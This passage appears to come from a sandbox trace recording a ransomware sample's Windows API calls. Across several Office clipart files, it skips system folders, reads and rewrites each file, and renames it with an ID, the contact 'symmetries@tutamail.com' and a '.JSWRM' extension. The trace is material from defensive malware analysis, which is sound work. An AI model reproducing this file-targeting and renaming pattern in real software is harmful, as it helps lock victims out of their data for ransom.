lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0083.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152568.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.991] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3696) returned 1 [0083.991] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe70) returned 0x23fc98 [0083.992] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe70, lpOverlapped=0x0) returned 1 [0084.025] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.025] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe70, lpOverlapped=0x0) returned 1 [0084.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0084.025] CloseHandle (hObject=0x314) returned 1 [0084.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0084.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0084.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0084.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0084.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0084.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0084.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0084.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0084.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0084.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0084.025] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152568.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152568.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0084.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0084.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0084.026] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe867602, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd28, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152570.WMF", cAlternateFileName="")) returned 1 [0084.026] lstrcmpiW (lpString1="J0152570.WMF", lpString2=".") returned 1 [0084.026] lstrcmpiW (lpString1="J0152570.WMF", lpString2="..") returned 1 [0084.026] lstrcmpiW (lpString1="J0152570.WMF", lpString2="...") returned 1 [0084.026] lstrcmpiW (lpString1="J0152570.WMF", lpString2="windows") returned -1 [0084.026] lstrcmpiW (lpString1="J0152570.WMF", lpString2="recovery") returned -1 [0084.026] lstrcmpiW (lpString1="J0152570.WMF", lpString2="perflogs") returned -1 [0084.026] lstrcmpiW (lpString1="J0152570.WMF", lpString2="documents and settings") returned 1 [0084.026] lstrcmpiW (lpString1="J0152570.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.026] lstrcmpiW (lpString1="J0152570.WMF", lpString2="system volume information") returned -1 [0084.026] lstrcmpiW (lpString1="J0152570.WMF", lpString2="msocache") returned -1 [0084.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0084.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152570.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152570.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152570.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0084.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0084.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152570.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152570.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152570.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0084.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0084.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0084.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0084.027] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152570.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.027] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3368) returned 1 [0084.027] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd20) returned 0x23fc98 [0084.027] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd20, lpOverlapped=0x0) returned 1 [0084.077] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.077] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd20, lpOverlapped=0x0) returned 1 [0084.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0084.077] CloseHandle (hObject=0x314) returned 1 [0084.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0084.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0084.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0084.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0084.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0084.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0084.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0084.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0084.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0084.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0084.078] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152570.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152570.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0084.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0084.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0084.079] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe867602, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ab4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152590.WMF", cAlternateFileName="")) returned 1 [0084.079] lstrcmpiW (lpString1="J0152590.WMF", lpString2=".") returned 1 [0084.079] lstrcmpiW (lpString1="J0152590.WMF", lpString2="..") returned 1 [0084.079] lstrcmpiW (lpString1="J0152590.WMF", lpString2="...") returned 1 [0084.079] lstrcmpiW (lpString1="J0152590.WMF", lpString2="windows") returned -1 [0084.079] lstrcmpiW (lpString1="J0152590.WMF", lpString2="recovery") returned -1 [0084.079] lstrcmpiW (lpString1="J0152590.WMF", lpString2="perflogs") returned -1 [0084.079] lstrcmpiW (lpString1="J0152590.WMF", lpString2="documents and settings") returned 1 [0084.079] lstrcmpiW (lpString1="J0152590.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.079] lstrcmpiW (lpString1="J0152590.WMF", lpString2="system volume information") returned -1 [0084.079] lstrcmpiW (lpString1="J0152590.WMF", lpString2="msocache") returned -1 [0084.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0084.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152590.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152590.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152590.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0084.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0084.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152590.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152590.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152590.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0084.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0084.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0084.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0084.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152590.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.081] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10932) returned 1 [0084.081] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ab0) returned 0x24d210 [0084.081] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2ab0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2ab0, lpOverlapped=0x0) returned 1 [0084.086] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.086] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2ab0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2ab0, lpOverlapped=0x0) returned 1 [0084.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0084.087] CloseHandle (hObject=0x314) returned 1 [0084.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0084.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0084.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0084.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0084.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0084.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0084.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0084.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0084.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0084.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0084.087] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152590.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152590.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0084.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0084.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0084.088] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe867602, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x18c4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152594.WMF", cAlternateFileName="")) returned 1 [0084.088] lstrcmpiW (lpString1="J0152594.WMF", lpString2=".") returned 1 [0084.088] lstrcmpiW (lpString1="J0152594.WMF", lpString2="..") returned 1 [0084.088] lstrcmpiW (lpString1="J0152594.WMF", lpString2="...") returned 1 [0084.088] lstrcmpiW (lpString1="J0152594.WMF", lpString2="windows") returned -1 [0084.088] lstrcmpiW (lpString1="J0152594.WMF", lpString2="recovery") returned -1 [0084.088] lstrcmpiW (lpString1="J0152594.WMF", lpString2="perflogs") returned -1 [0084.088] lstrcmpiW (lpString1="J0152594.WMF", lpString2="documents and settings") returned 1 [0084.088] lstrcmpiW (lpString1="J0152594.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.088] lstrcmpiW (lpString1="J0152594.WMF", lpString2="system volume information") returned -1 [0084.088] lstrcmpiW (lpString1="J0152594.WMF", lpString2="msocache") returned -1 [0084.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0084.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152594.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152594.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152594.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0084.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0084.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152594.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152594.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152594.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0084.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0084.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0084.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0084.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152594.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152594.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.089] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6340) returned 1 [0084.089] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18c0) returned 0x205850 [0084.089] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x18c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x18c0, lpOverlapped=0x0) returned 1 [0084.091] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.091] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x18c0, lpOverlapped=0x0) returned 1 [0084.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0084.091] CloseHandle (hObject=0x314) returned 1 [0084.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0084.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0084.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 